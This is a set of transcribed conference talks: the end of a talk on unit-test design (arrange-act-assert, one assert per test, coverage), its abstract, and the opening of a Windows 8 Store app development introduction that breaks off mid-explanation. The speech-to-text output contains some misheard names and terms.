think in 2003. So I have a link below that. And it's very simple. It's just ‑‑ it couldn't be simpler. But it actually explains what data being set up, what data being executed, what concerns we are interested in this test, and what kind of verification we are. So when we actually organize our test with a range actor third, that is becoming so easy to achieve readability and to help people, those poor souls who will read it a few months later. So before we go and look at each step of range actor third, let's look at the example. That is an example. That is trying to test something. And I called it messy test example. Is it easy to understand what it is doing? Can we easily identify what is actually happening in this test? It's probably not that easy. So let's look where a range an actor served in this test. Let's look at that. So if you try to understand and read it carefully, and it took me some time to actually color it and understand it, so you are setting up something and then you are doing some mix of a solution and execution, and then you are setting up something else, then you are doing something more, and you are doing all of that stuff. And I think if we look at that test, we see a several arrange, and sometimes a range actor third is even mixed up all three together. So someone who will read that test will be actually confused. What is this setting up? What is happening? What is going to be? And he is going to spend a lot of time to understand it, and he doesn't want that. So maybe one day he will say, okay, I'll look at that later on. I'll put this test to hold. I'll mute it until sometime. And that actually never works because there is a tendency this test to stay there forever. So that is a violation example. So what we can do to make it better. And let's look at the arrange part. Arrange part is responsible for data set up. And the important thing here is that it is all consolidated at the beginning of the test. There is nothing that you can set up something, then execute something, then set up something more, execute something. We are setting this up at the beginning of the test. And to do that, there are several actually partners that I used to clarify of what you are setting up. Two of them, for example, are object, mother, and fluent interface. Those are partners that we can use, and I'll go into example in a minute just to clarify what is being set up. There are some links on Martin folder, what you can do about them more. Let's look at the example again. So this is another example. And that's quite simple. So let's look at the test on the left. What it is actually doing? That is trying to set up some points. What is this for? That is trying to create some plane. So probably point three is a class that is a point in a three-dimensional coordinate system. And then plane three, some plane in a space. But what is this? What is this? 0, 0, 0, 1, 0, 0, 1, 1, 0. We have to kind of think about it. Why is those digits are here and stuff like that? And that is an arranged part. That is consolidated at the beginning, but we can't actually read what is happening here very well and just at a glance. So let's look at what we can do. What are we actually doing? I will call it we are creating XY plane. We are creating XY plane here by those numbers 0, 0, 0, 1, 0, 0, 1, 1, 1. That is just XY plane, the plane perpendicular or token out of the Z axis. This plane is well-known and people understand what it is. So we can just create a method, a helper method that would just create XY plane and just name it that we are creating XY plane. And if you go to right-hand side, the one who is reading, he is actually understanding that this is XY plane created. Okay, I understand that. And what is the point? Where is this point? We create a point at the axis. So we understand there is a point exactly on the axis that we are creating. And those are matters, those are data that we are going to test. So here is the helper matters and we could call them object mothers. So those are methods that we consolidated to actually make a better readability for this test, with simple example. And we emphasize what data are being set up. And we could actually abstract from the constructor details as well. And we could reuse it in several other classes. And we could create objects that we are familiar with. For example, we can create diagonal plane. And we could create horizontal plane. And we could work with those objects in our test framework, in our communication framework. So we understand what kind of dummy objects we are creating to test. And those helper methods actually serve us as a mother for those objects. There are many methods to create XY plane, but we only use those points. But we don't want to know what kind of points we use just to, we want to abstract on those details. That makes our test readable and our setup readable. And fluent interface, I don't have example, but it's very similar if you have a long constructor, you can actually set up special methods like we's, I have a girl with a balloon or go without a balloon. And then you can build that particular object and return it. So you create sort of a specific number of dummy objects that you are working with in your test framework. And that is very handy. And this is very good for readability. So that was arranged. And there are more buttons for arrange. There is this book, X-Unit Test Partons that Geraldine Marsalis has written. This explains all of the things that we do in detail. It's 900 pages if you want to read it. Let's look at the act. What is actually act? It is code execution. So what we can say about it, we just execute the code. But there are some things that we can think about as a back practices. We could make it visible. Yeah, some people insert asserts in the act part. That shouldn't be there. We should assume everything works here. We are only executing what we are trying to execute. We don't know anything else. And if you want to actually isolate ourselves from the environment, we can use stubbing and mocking. And use the different dummy fake objects for those that our object depends on to make it isolated. Let's look at this example again. What is this act part? It's not quite clear. It's actually here. And it's mixed up with assert. So the one who is reading that, he has to understand, he has to read it like a just wide line, which is not very handy. I think it's just a mixed up. But on the right-hand side, we can see a call. And we can actually understand what is happening here. We actually make a plane and calculate a distance to a point. And we get this number. That's what the one who is reading the task would be interested in. And this is much more readable than we have it here on the left-hand side. So the act is separated here. And it is clearly visible. And those are some other examples of act that are what we do here. We just execute some code, calculate some context, do the work that we need to do. And now we come to assert. And the assert is a verification stage. It could be state verification and it could be behavior verification. And state verification is where we verify the state of our objects, what happened to our objects, what are stated. And behavior verification is a little bit more tricky where we verify actually how our object influenced the other object. Have it been called? That is also a button and we should do one or another or not mix of it. And the best practices here is to have one assert. So, and why we should have one assert? Mostly it is because you will never execute multiple asserts in the test. The test framework wouldn't let you to do that whatever the test framework is. And Microsoft framework or G-unit, they will just stop at the first assertion. That's how they design. And you will never be able to execute all of them. But you want to focus on one thing, what you are doing. And you want to write a clear message for that assertion, what actually happened. This is only achievable with one assert. And if, for example, some people just try to write an assertion or let the asserts that assert in different properties of one object, that is easier to do just comparing objects. And just one assert should be a rule, I think, for everybody. Let's look at the example here. So here we have two asserts. So that is testing completely different things. So we actually can divide this test in two different tests. But on the right-hand side, this is clearly visible what is being tested on the assertion. So that was arranged after assert. A pattern that if you use it, you actually almost achieve readability for free. Because I used to write the messy test myself. And when I was trying to understand what this test is doing and someone else, it's just what are concerns being tested? What are data being set up? And what is being verified? And once you reply to yourself on those questions, that is easy to make a decision what actually happened in a code. But what else we can think about when we think about how the test should look and what it should do? Let's look, let's talk about the test scope. The scope of the test. It should think, it should test one thing. It should focus on one thing to test, not on multiple things, on multiple aspects, maybe the problem with multiple properties of an object. An indication that we are testing several things would be that we are having some logic in the test. If you're having if you have a statement, if you have switch statement, if you have for loop, we are, it's very high probability that we are testing different things in one test. That we are trying to test multiple aspects of that. And of course, if you have multiple asserts, we are almost certainly testing different things. If you are wondering about that, you can try to name your test just by looking at all the asserts and just write the sentence that this test is doing, this distance, you get a long sentence if you have multiple asserts. It will be several things. So that's a good practice to have one thing and it will help people to understand it later how actually test is, how test is working, what test is testing, the size of it. What is a good test size? That is a religious issue again. So I believe in five lines. Some people believe in maybe another amount. But generally, I think the perfect test is a five line, maybe six lines, I don't know the exact number, but again, it's a religious issue. I think six, I can imagine the test that would have 16 lines and would still test in one thing. I have never seen test 25 lines testing one thing ever. Anyone seen that? Okay. And that was testing different things. Yes. So it should be small and I believe this function should be small, but the test should be small to test one thing, to focus on one concern. And let's look at the good test naming. That is very interesting issue. So we have that concept, don't repeat yourself in coding. That means we are, we want to remove duplication. Duplication is a maintenance for us. We don't want that in a code. We don't want to repeat ourselves. But from the other side, we have the idea of writing everything in descriptive and meaningful phrases which is coming to us from the main specific languages. And there is kind of a balance between it because the more we write in descriptive and meaningful phrases, we could actually violate that don't repeat yourself principle. And I think test lives in its own little world. It's isolated. It shouldn't have any knowledge from the outside world. And because of that, sometimes trying to remove duplication, we are actually sacrificing the business logic and the meaning of the test. So in testing, being descriptive and meaningful is more important than removing duplication. Sometimes that's fine to have some sort of duplication in a test than actually trying to force people to read some other code. I was actually struggling to get an example for that. I actually pulled out some code I written a while back and that was a good explanation. But it was so difficult to understand in such a short time. So I just removed the example. But think about that. And being descriptive is much more important in tests because they live in their own little world. And that's fine if you repeat sometimes. It's a test code at the end. It's never executed in production. Good test coverage. That is my favorite slide. How much we should test? We talk about coverage all the time. Management uses it as a metric to detect quality. Is it really true? So I will tell you a story. Three programmers asked the gray master of what coverage should I aim for. The first one asked and the great master said, don't worry about that. Just go and try some good tests. And the second one asked about that. What coverage should I aim? The great master said, how many grain rice should I put in that pot? That depends on the second programmer. It depends because how many people you have to feed. What other food you're serving. What actually you are, what is this, how hungry they are. And those things are how I can tell you. That's what he said. And the master said, yeah, that's right. And that programmer left. And the third one came. What coverage should I aim for? 80% at no less. Said the great master. And then the followers came to the great master and asked him, we heard that you did the three different answers to the same questions to different people why it is. And he said, the first one was new to unit testing. So he had to just focus on writing some good tests. And the second one was experienced. So he understood and realized with my answer that there is no simple answer to that. The third one just wanted the simple answer to the question that doesn't have any simple answers. So he got it. 80% at no less. And in coverage, it is very important that we should balance. Does anyone has 100% coverage? We are saying that we just have to do it. Do we have to blindly follow the coverage? Do we have to blindly aim 100% or 80% or whatever number, simple number? I can't believe that it could be some tests, some projects with 100% coverage. They still have bugs in that. We have to focus on something else and just test coverage. We have to focus what we are testing and where we are testing and what we are testing. And we can talk about also coverage duplication here. And this more brings us to the questions when we are testing. So we have isolated tests that test local things. And we have tests that are integration tests, results, stubborn and morking. The isolated tests are unit tests referred to. So we are focusing on one class, one object. It's very local. And then we have end-to-end tests. And we have to have end-to-end tests. Because there is no way that we can test the system. And we don't have end-to-end tests. However, anyone had a situation on one change in the code cost hundreds of tests? Yeah, a few people. That happens because we have some coverage duplication in our tests. And the good practice that we found here is just to run the isolated tests, local tests before and make sure that our local systems work fine. And then run our integration tests, end-to-end tests afterwards. And there should be the way less integration tests than the local tests. It's a normal situation. And then when we run the integration test, there's just a few. They test the actually components communication. They don't test the local things. And we call that smoke test that we run. And we run them first. And we make sure everything is fine. And then we can allow execution of the integration test. So that is a very good practice that we found for ourselves. Good tests fail. And they fail. And they want them to fail. But they want them to fail just for one reason. One good reason is that the functionality code change. We don't want tests to fail randomly due to some isolation problems. We don't want them to fail because there are bugs in them. We want them to fail just because we change the code and it fails. And there is a dependency on that. But we don't want random failures. But they appear that random failures and isolation problems and test bugs, they're quite easy to fix. But to find the tests that fail where we want it is quite difficult. We want to write a test that will save us some time in future but we cannot predict the future very well. How we can predict the failure information. Where should I test? Each test is associated with a cost. I have to spend time writing it. People have to spend time executing that. And we have to think carefully how we are going to write the test. Where? And here is Ken back. And he said, I should test where I'm likely to make a mistake. Not the things that always work. That's fine. But how do we know where we'll make a mistake? That is probabilistic investment. We don't know. That's a bet. We just... But we can think about it maybe. And he's saying, for example, I tend to make mistake around conditionals so I am trying to write a test around conditionals because I know I'm making mistakes there. But what else we can think about when we talk about the good test value? Can we predict the failure information? We normally don't think about it very much. But if you have a test and you have a code and everything works, can we think about when it will fail? We can try to comment out production fault and watch it fails. We can try to change production code in a way that we think it will evolve in the future and watch it fails. And that is a very good exercise in determining when the test will fail. And we normally never do that exercise when we write the test. We can look at the test as an API, as a documentation to our code. And we... This is a very good practice as well because we have... We are seeing what we are trying to achieve. And here we can predict maybe how it will evolve, how it will change. So we want the test when we feel like they are valuable, but not before. And that is a thing that what we can think about when we write the test. Which test to write and which test not to write. So what is a good test? So the question that we ask ourselves when we write a good test is how easy I can understand it. And more important is not like I can understand it and how easy someone else would be able to understand it. It is very, very likely that you will not be reading that test. You are doing it for your peers. You are doing it for the one... The poorest soul who will come to the project a few months later and say, ah. And then when it will fail, will it fail? What kind of mistake I should make so it fails? And where I can predict the bug? And we can think about coverage, of course. And we should think about coverage. But we should understand that this is not a simple answer to the coverage question. So we figure that the good test when we look from the maintainability point of view, it is more important to think about how it looks and where it tests. And then thinking about when it will be run and what it is actually testing and focusing on coverage. That was it. Thank you very much.
|
Little over 10 years ago, we have learned and adapted test-driven development (TDD). TDD is a huge step forward to software quality, as well as to the value of your software as a company asset. Functionalities and architectures wrapped with tests can be changed under control and evolve — one of the biggest achievements in the industry during the last decade. When codebase grows in size and complexity and dependencies start degrading team productivity, the problem of how to maintain automated test base comes to stage. Production code changes over time due to new functionality, bug fixes, etc. – and it affects test’s code and lifetime of the tests. If a test fails due to changes in code, it means an error has been detected early and the test has done its job. This is point where a developer should fix a problem and a key to fix is understanding of the test, why it fails. This leads to good test design as key component of continuous integration. We cannot submit on red build and then cannot change and develop our application. We generally want to run the whole the test suite before every code change submission and how long does it take to run - plays significant role for big projects. if whole test suite takes more than 15 minutes, it becomes an obstacle for doing frequent changes. Teams start running not full suite or try to detect relevant tests for this particular change, etc. Problem of redundancy in unit testing due to the large number of people is working on a project become important once test code grown in size. Developers write tests for their components, and some tests overlay each other—often covering the same code over and over again. This is not a problem from quality point of view, but maintenance can be an issue. Here we come to distinction of unit test and integration test. The important quality metric is code coverage. There are aspects that this metric does not reflect: sensitivity to input data. Many workflows are vitally dependent from input data: small difference in data would only add couple of lines of code to coverage, but makes huge difference in calculations and final results. However, we often do not take these effects in account when measuring quality metrics. Our most valuable tests are those that fail more often than other. The right test is the test consciously addresses right scope, have expected time to run and easy to understand when fails. I my talk I will be speaking about how good test design affects productivity of agile project based on large and legacy codebase. I will be focusing on lessons learned from existing project, I have been involved with, coming up with examples of good and bad test design and its consequences in project delivery. I will be giving live code examples on the go.
|
10.5446/51458 (DOI)
|
Can everyone understand me? Yeah? Okay. Welcome to this session. It's Windows 8 introduction session. So let me first quickly set the stage so everyone knows what to expect. As this is an introductory session, I am going to walk you through a Windows 8 application. Look at some of the trades that make up a good Windows 8 application like semantic zooming and snapping and stuff like that. And after that, I am going to show you in code how that's done. So it is an introductory session, but it does require a little bit of XAML and C-sharp knowledge. Otherwise, it might be a bit hard to follow. Okay. So with that out of the way, let me start by introducing myself. My name is Kevin. I am a technical consultant at Will Dolman. I have worked there for about nine years now, I think, and actually started off building WinForms applications, after which I went to web applications. So I did quite a bit of ASP.NET web forms, C-sharp. And at a certain time, Silverlight came about. So all of a sudden, there was this new, stateful, web-like thingy from Microsoft. So I threw myself into that. And after that, well, XAML was kind of a given. So Windows Store applications came about. And due to the XAML knowledge I already had from Silverlight, I kind of rolled into building Windows Store applications. And that's what I do now. I mainly build Windows Store applications for my company and still some ASP.NET MVC stuff. If you want to contact me, the easiest way by far is probably Twitter. You can find my handle on there. Or you can also drop me a mail if you want. By the way, I also have an app in the Windows Store. It's a bit of a Facebook app. So if you're looking for that, you might want to check this one out. Anyway, what are we going to talk about today? Well, as I said, I'm going to guide you through a Windows Store application. It's one I built. And we're going to look at what makes up a great Windows Store application. And then we're going to go into all this stuff. And we're going to look into each of them one by one to see how it's done. So we'll start by how we can lay out our data and how we can group our data. There's a few controls built into Windows Store SDK for that. Now we're going to look into semantic zooming. Of course, I'm going to explain you all of this first. And then we're looking into how we can enable that in our application, which is actually terribly easy. Then we'll look at how we can snap our app or what we have to do when we're developing an application to ensure our app is snapable. Because Windows 8 applications do have to be snapable if you want to make sure they're approved for Windows Store. We'll also look into a few navigation patterns, different ways you can navigate through your application. Maybe a quick question. I don't really see all of you, but have you guys worked with Windows 8 already? Yeah? A few of you have, a few of you haven't. Well, for those who have, don't come as a surprise, but for those who haven't, Windows 8 applications and the way they behave to Microsoft Design is quite different from what we're probably used to building WinForms, WPF, Silverlight, or Web applications. So there's new design language and that new design language comes with a few things we, even as developers, have to keep in mind. Navigation patterns, one of those. We'll also look into how we can add a command bar. And then we're going to go into, well, as far as I'm concerned, one of the more interesting things about these applications and that is the contracts, being, searching, settings, and sharing data. Because as far as Microsoft is concerned and new Microsoft Design style is concerned, your application isn't on its own anymore. If a user has a bunch of applications on his machine, on his tablet, whatever, why not let these applications work together? And that's what these contracts are for. So we will see how we can make our application leverage features from another machine. And we'll also look into how we can build a nice lifestyle, which is what you see on the Metro or Windows Store design style start screen. Of course, that's not all there is. I have one hour, so I can just more or less touch the beginning of what's there. So I'll quickly go over a few other things that might be worth looking into. And I hope I have a few minutes left for Q&A at the end. This, by the way, makes up for about 40 slides. Don't worry, I'm not going to show all of them, but I did put them in the slide tag, so you can have them as reference afterwards. You can just download the code and the slide tag afterwards. So as I promised, I'm going to show Windows 8 application first. I have one up and running here. Does anyone remember Woodgrove? No? That was actually a demo used for Microsoft a few years ago once they started with Silverlight. It's a banking application. So the general idea is this application shows you the products that are available in a bank. So what we've got here is our bank name and our products grouped by category. Category credit cards, a bunch of credit cards, and like that you can go to the other products this bank might have. Now the first thing you might notice here is, well, the first thing I notice at least, there's no clutter. There's no menu bar. There's no status bar. There's none of that. That's the design principle and that's called content before Chrome. That's actually very important because it goes through all the principles of building a Windows 8 application. In general, it means don't clutter your user interface with commands, don't clutter your user interface with menu bars, simply don't clutter your user interface, but give preference to the content. When the user looks at your application, he's probably more interested in the content than where he is now, than what he can do with the content because that are commands he only needs when he wants to effectively do something and to where he can go. So that's the first thing you'll immediately notice, content before Chrome. It comes back everywhere. The second thing I've already shown you is horizontal scrolling thing. That's also something that's very common in Windows 8 applications. I'm working landscape mode and they typically scroll horizontally versus the regular applications that might scroll vertically. It's not necessary but it's kind of a nice touch in my head. Now, you might see this page as a bit of a hub page. The user comes into the page. The user comes into the application. This page is the first thing he sees. It has group data, but there might be quite a lot of data on the screen. In this case, I have like five groups, I think, credit cards with a bunch of them, housing loans, investment products, up to services. That's still okay if you've got five categories, but imagine there are 20 categories and each category has 20 products of its own. If the user wants to go to a certain category, that might become very, very annoying. So how do you actually navigate to a category like that? Well, that's why a principle called semantic zoom was introduced in Windows applications. Semantic zooming is what you get when you do this. I use control and mouse scroll to zoom out of my data. If you're on a tablet or something touch enabled, you can just pinch to zoom out. Semantic zooming allows you to get an upper view, let's say, of your data. In this case, I zoom out and I zoom out to the category level. Once I click or tap one of these items, I'm immediately more or less at the group I wanted to go to. So that's actually a pretty nice way of navigating through your data. You just zoom out on the data, you tap and you're zoomed in again right where you want to be. Important, by the way, if you're using semantic zoom is the context. So you're zooming out on data, you're not supposed to end up in some completely other kind of data. Just to give a bad example, if I'm on this page and I have a bunch of banking products and I zoom out, I do not all of a sudden want to be on an employee management page. Just to say something. Right, so that's for navigating in your data on the same screen. But obviously, there must be other ways of navigating. And one of the ways of navigating, there's actually two that are used nicely together. One of the ways is just on screen commands. And this is very, very common and users are very, very used to this because it's more or less how links on the web tend to work. You just tap a group, header in this case. And all of a sudden, I'm in the investment products category and I can tap even further and I'm at the detailed page of some products. If I want to navigate back, I simply have a back button here. So that's on Canvas commands for navigating. Now, there are of course other ways of navigating. You might have an application that consists of different modules. For example, this banking product module might also have a disbanking application, might have a banking products module, but it might also have a reporting module or an employee management module. To navigate to those, Microsoft introduced something called navigation bar. And you get it by right clicking or just swiping from the top of your screen down. And that's actually just a bar in which you can put some buttons. In my case, my app has exactly one module, so it's quite easy. So that's another way of navigating. And when I was talking in the beginning about content before Chrome, well, you might wonder, what if I want to do something with one of these products? Well, let's click one. Let's say I want to pin this to my start screen or whatever, then you need some kind of way to have a command on this product. In commands, they go not on screen, but they go in the command bar. Yup, that's the wrong click. Here we go. In command bar, that's the bar at the bottom of your screen. So navigation bar on top, command bar at the bottom, in which commands related to that screen should go. Now, that's a simple example. You can also have context sensitive commands in your command bar. For example, a list of products, and you want to delete each of them. You just select all four of them. Command bar pops up, and once an item has been selected, you can have a delete button right there. So the delete button goes in the command bar, and not as you can have in typical web or in forms application right next to each record. Why? Well, again, this principle comes from the content before Chrome. Content on your screen, Chrome, only when you need it. Now, these are design principles. You will see applications in which there are commands on the screen. A good example of this might be, well, imagine you have a shopping application, and your user wants to check out, or you have these baskets of shopping items. Well, that's typically a command that could go on screen, because it's very essential to the application. But most of the commands sorting, deleting, selecting should go in the command bar. Now, I'm telling you all of this, and mostly when I do stuff like this, I start seeing very weird faces from the audience. Because they say, like, how the hell is my user supposed to know all this? Because the user is new to Windows 8 as well. Well, it's a bit chicken or egg thing. If you're one of the first people to build an application like this, well, probably your user is going to have some trouble adapting to it. But if all applications for Windows 8 adhere to the same design principles, it will work in your benefit afterwards, because the user will already be used to finding the commands in the command bar navigation on top from other applications. So after a while, the user will know where to find the commands and how to work with a Windows Store application. That's why it's quite important to keep to these principles. But, well, if you're one of the first, you will probably have to answer a lot of mail about where can I find commands to delete a credit card or something like that. Anyway, as you know, these Windows applications, they don't just run on laptops or desktops anymore. They also run on tablets. And they also run on a lot of form factors. So one of the things you can do when you're running on a tablet, for example, is running, or on this, is running two applications at the same time. And to enable that, you have something called Snap Mode for your application. And snapping an application, that's this. So I now just snapped my Windows Store application to the left of my screen. And this enables my user to run another application right next to it. In this case, I am running my Woodgrove application on the left, and I am running my desktop, which is, I'll just look at it as an application which can do more or less everything. That's the easiest way to explain this. Well, to my mom at least, so she understands. And when you're snapping, this effectively allows the user to work with two Metro Windows Store applications at the same time. Also important here is to not confuse the user. So when you snap, you just use the same data, and you keep in the same context. So I snapped the application, and it's still banking products on the left. It's not all of a sudden employees or something. So that's important, stay in the same context. By the way, interesting thing, you might know Windows 8.1 is coming up. One of the things that will be possible there is you will have a lot more possibilities as far as snapping is concerned. You will be able to run different applications next to each other instead of two, I think like four or something, and you will be able to make them bigger and smaller just as you wish. Okay, that's snapping an application. And then there's a, in my most interesting part and last part of this piece of the presentation. That's how these applications can work with the Windows system on one end and with other applications on the other end. That's done through contracts. For example, imagine I want to search through this application. That's pretty common, pretty common, pretty common use case, search through the data in my application. What would typically happen? Well, you would probably make a search page and you have some filters, et cetera, et cetera, et cetera. There's a better way to do this now, and that's through the search contract. Because Windows 8 has on the right of your screen the charms bar, which contain a few common commands, common functionality is a lot of applications might have. And the general idea is that if you want, in this case, search in your application, you should direct your user to the search charm. And like that, you have a common way of searching through all the applications on your Windows system. The nice thing is, my application here is now the current one, so the active one. So if I start typing and I press enter, I will search through my application. But as you can see, I have a list of other applications here. I have quite a lot of applications. I have a list of other applications here. These are installed applications on my computer that I've told Windows. Hello, Windows. I'm also searchable. So the nice thing is that I can just, from the search screen, on any part of Windows with any app active, I can just start searching through the active app, but I can also start searching through any other app. So that's actually pretty nice. Your user doesn't even have to have your application up and running or active to be able to search through it. You can just type in something, gold, let's type correctly, and well, the Woodgrove banking app is selected now, but I can just select any other one to start searching for gold through Facebook or Bing or whatever. I'm not going to do that. I haven't got the internet connected here. So I start searching. Do I have any? I have a gold credit card. I wish I had a gold credit card, but the application has a gold credit card, so I found that one. So that's far the searching is concerned, but I also said something about leveraging functionality from another application, and that's the really nice one. So imagine I'm reading about this gold credit card thing, and I'm thinking, well, I can't afford this, but maybe one of my friends can and he can buy me lunch because I told him where he could find it. So I say, well, I want to share this information with one of my friends, and then you can use another charm, namely the chair charm. That's too many S's in one sentence. And what will happen here is I have said to Windows, hello, Windows, my application can share this data. This data can be a URI, an image, text, HTML, whatever. And what Windows is going to do then, it's going to look through all the other applications installed on my system, and it's going to look and going to search for applications which have said to Windows, hello, Windows, I can handle that type of data. And the thing is, from the moment on, I tap one of these other applications, the other application will take over. So that means that I no longer, I as an application developer, I no longer have to write code to share this on Facebook or on SkyDriver on Twitter. I can just rely on the fact that if a user wants to share something on Facebook or on Twitter or through mail, he will probably have a Facebook app or a Twitter app or a mail app. So I can just leverage that instead of writing it myself. It's actually a pretty nifty way of applications working together. And it's quite easy to do. I will show you how it's done. And it makes it very easy to have extra functionality in your app without having to really write a lot of code. Okay. So I think I more or less went through all I wanted to say here. There's more, of course, but can't show everything. So let's go to the first part and that's laying out and grouping data. Well, I told you there are a few controls in Windows Store applications built in, which enable you to show your data nicely. There's actually three, three big ones, and they all inherited from this few base. So they all have more or less the same base functionality. That's a list view. The first one you see here, as you can see that it's typically for vertical scrolling. That's the one you saw when I snapped my application. That was a list view. Then there's the grid view. That's for the horizontal scrolling. And the third one here is the flip view. And the flip view is what you get when you want to start showing your data one by one so the user can just flip through a bunch of photos, for example. Now both list view and grid view support grouping out of the box, which is exactly what I'm going to show you. But you might wonder if you come from WPF or Silverlight, well, where's my list box? Why is this all of a sudden a list view, not a list box? Well, the list box is still in there as well. And you can still use it, but I would advise you not to because the list view is more optimized for touch. It has bigger margins and padding out of the box. It actually supports a few extra events. You can subscribe to touch enabled events. So if you can, I'd advise you to use the new controls and not the old ones, even though the old ones you're used to from WPF are still there. Right. So let's have a look at that. And I'm going to be in code for a while now. I'm just going to show you how a few things are done. Can everyone read this or should I put it a bit bigger? It's okay? Yeah. Okay. Good. Let me quickly start by explaining how the application is set up. It's actually a very, very simple one. I have a service layer, which I reused from another project demo. That's actually one simple WCF service with entity model behind it going through a database, of course. What does this service contain? I'm just quickly going to show you to see what's happening, but it's not that important in this case. Service actually just contains a few methods to get the categories, to get the image, and to get the images related to the category. And these two I don't even use. So mainly what we're going to use is the get categories methods, and this method will give me back a bunch of categories, and for each category a bunch of child items. So that's pretty common, very simple service layer. So that's where my Windows Store application gets its data from. The notification extensions project here, that's from the Windows Store SDK. I'll talk about that later on. It's to make it a bit easier to work with live tiles, but that's for later in the session. So the important one here is my would-growth.client. That's a Windows Store application. You get that file new Windows Store application template. And as most XAML applications, this consists of a bunch of views, which are the things you've already seen. The products group page was my main page, product category, by category, and detail, well, that's the detail page of one banking product. So it consists of a bunch of views, which contain my XAML code to describe my UI, and a bunch of few models, which are responsible for translating my model into properties my UI can bind to, more or less. That's all pretty basic. I'm guessing most of you will know about this. So let's immediately go into Windows 8 specifics. So first thing, I should probably show you is how did I get my data in my application? Well, that is logically, in this case, going to be in the ViewModel. So let me quickly show you. It's a very, very easy one, probably not the best programming principles applied here. So what's happening here? I've added a service reference to my catalog service, and I call the getCategories method, which will return me a bunch of categories with their child items in there. Now, this is pretty regular code for most of you, I think. Were it not for the whole async await thingy? Is that anyone know that? Yes, in co-awaits? Yeah, I see some of you do, some of you don't. There's a lot to say about this. And, well, I have a session tomorrow in which I'm going to tell you a few things more about that. For now, it's probably most important to know that this await keyword, this actually tells my compiler to stop with the method execution until this async method has returned from the server with its data. So what you used to write would be proxy client.getCategories async or getCategories, and you would typically have a completed event handler on your proxy client for the return of this method. And in the completed event handler, you would get your categories back. Well, this await keyword actually ensures that the execution of my method is awaited until this async call has been executed and is back. So it's actually pretty nice because that means at the same time other threads might run, another code can run, this does not block your application anymore. And what does the async keyword here mean? Well, it actually just means that my method can contain, can be awaited, can contain code that awaits other methods. So with that out of the way, we now know that the getCategoriesAsyncMethod will return me a bunch of categories which in turn contain all these banking products. And then I simply take that list, I order them by title, and I put them in an observable collection of catalog category. These observable collection grouped and ordered categories is then made available as a property on my view model so I can bind to this in my view. Okay, so far so good. This is actually an already grouped list. I get a bunch of categories back with a bunch of items in them so they're already grouped by category. So we know how our data gets to our application. Now, how is this shown in the old example? Let's look at that. So logically I should find grouped and ordered collection somewhere in this. Let's first have a look at the grid view itself. So the grid view, that's what showing my horizontal items. And ignore the semantic zooming thing for now. We'll look into this. As you can see here, this grid view somehow gets its data from something called the grouped items view source. Okay, so we're not there yet. That means I must somewhere have a collection view source named grouped items view source on my page. And that's more or less where a part of the magic already starts to happen. Because I have just declared a collection view source on my example page named grouped items view source. So that's what's used on my grid view. So now we know that. And here we find the grouped and ordered categories property from my view model. So somehow this collection view source gets its data from the view model. Collection view source, you can see that as a view over my data. So I have my data coming back from my service and the collection view source offers me a view over this data, which can be filtered and sorted by the way. But the thing why I use it here is because it can also be grouped. And that's one of the nice things. As I said, the grid view supports grouping out of the box. And how does it support that? Well, if you bind it to a collection view source, you can state on that collection view source that it is grouped simply by setting the is source group property to true. And by telling it where it can find the child items. So in short, what does this code mean? This code means that there's a collection view source named grouped items view source, which contains six categories grouped by category in this case. And it can find the child items in catalog products. So just by stating this little bit of code, my grid view will automatically group these items. So I actually thought that was a pretty easy way to get grouping in your application. Now, as far as the rest is concerned, that's pretty much standard example. Of course, I have to declare how my, let's see, let's start with this one. I have to declare how one product will look like. So in this case, we have an image, which is what you've already seen. And it's overlaid with a nice looking background with a title and description. So that's one of the products you see here. And then, of course, I have to declare the group template as well. So this is one item template. Now I have to declare how a group template looks. And that's even easier because that's simply the title of my catalog category. And the Chevron glyph here, that's the nice arrow. So this here gives me this. And the thing I just showed you, that's one of these items. Okay. Of course, all these properties, these are effectively properties of what I get back from my service. My category has title. But I'm guessing that's probably obvious. Okay. So now we already have a nicely grouped grid view. And we know how we get our data in our application. So the next thing on the list was the semantic zooming. So zooming out of this grid view. And I think the code on screen kind of gives it away already. Because I have just put a semantic zoom control built into Windows Store framework around my grid view. And in the zoomed in view, I have put the grid view I've just shown you. And in the zoomed out view, there's another grid view, which I will immediately show you. Now this is all that it's, this is effectively all that is needed to enable zooming in and out. Just put a semantic zoom control around your grid view. Now of course, I somehow have to declare how one of these items in the grid view when zoomed out looks like and where it gets its data from. So that's where the zoomed out view comes into play. So that's this one. I somehow need to say, well, where do you get this data from? And as we can see, it's a grid view. It looks a lot like the previous one. I simply have a template for one of the items. But the thing that is missing here, I don't know if you see it, but there's the item sources in set. So this is a grid view. If you look at it like this, that doesn't know where its items come from. And the second thing that's a bit weird is that all of a sudden I have a group property. I don't have any group property. I have an image. I have a title. I have a description. But there's no group property in my data object. So one, how do we get the data? And two, where does this group property come from? Well, let's have a look at that. This is actually all that's needed for this. Again, this is why I'm using the collection view source. So what I do here is I find my collection view source on my page, which is, as I've shown you, the grouped items view source. I find the current view of it, which is my grouped view. And then I go to the property collection groups. And this collection groups property, well, that simply contains the groups from my underlying data. So the collection groups, that will contain my categories. The only thing I have to do then is to make sure that my zoomed out view gets the correct item source. So I simply take the zoomed out view, cast it to a list view base. As I said before, grid view inherits from list view base. And I set its item source to groups from my collection view source. And immediately, that is also where the group property comes from. So the group property you see here, this one, that's implicit. You get that when you use the collection view sources groups property. And as far as all the rest is concerned, so the automatic snapping to the correct part of your page, like this, housing loan, ghost loan, credit cards, I'm automatically back at the credit cards part of my grid view. You get that free. So you just get that out of the box by writing the code I just shown you. So there's no need to catch any events for that or something. Okay. Next up, snapping. So as I quickly talked about, your app, your app, your Windows Store application should support snapping if you want it to be able to go to the Windows Store certification. So if you want your app to be in a Windows Store, it should support snapping. There's another mode as well, that's portrait mode. It's what you get when you turn your screen around. Your app should not support that one. But I'm just saying it gives a nice extras, but you're not obliged to do that. Now, how can you say that you want to support one mode or the other? Well, each Windows Store application also has a net manifest file. We'll get back to that later on, but I'm going to show you already. Because this app manifest file, here you can say which rotations are supported. I haven't checked any of them, so I support all. But if you do not want to support portrait mode or you do not want to support a certain flip mode, you can simply check the only ones you want to support. Okay, but snapping must be supported. And they're a bit related here. Because how do you... Well, there's actually two things we need. One, how does my application know how to snap? And two, where do I define how it looks when my application is snapped? The first one is the easy one. So, let me just stop this. And going to codes. So, if you've worked with XAML... Oh. XAML... Ah, there we go. If you've worked with XAML, you know about something called the visual state manager. That's typically used to go to the different states of a certain control. For example, if you have a button, this button will use its visual state manager instance to go to Hoover state or to go to clicked state. Now, the same goes for all my views. So, on each of these views, I have a visual state manager. And this visual state manager. Let's have a look at it. This is the one that takes care of ensuring the right controls 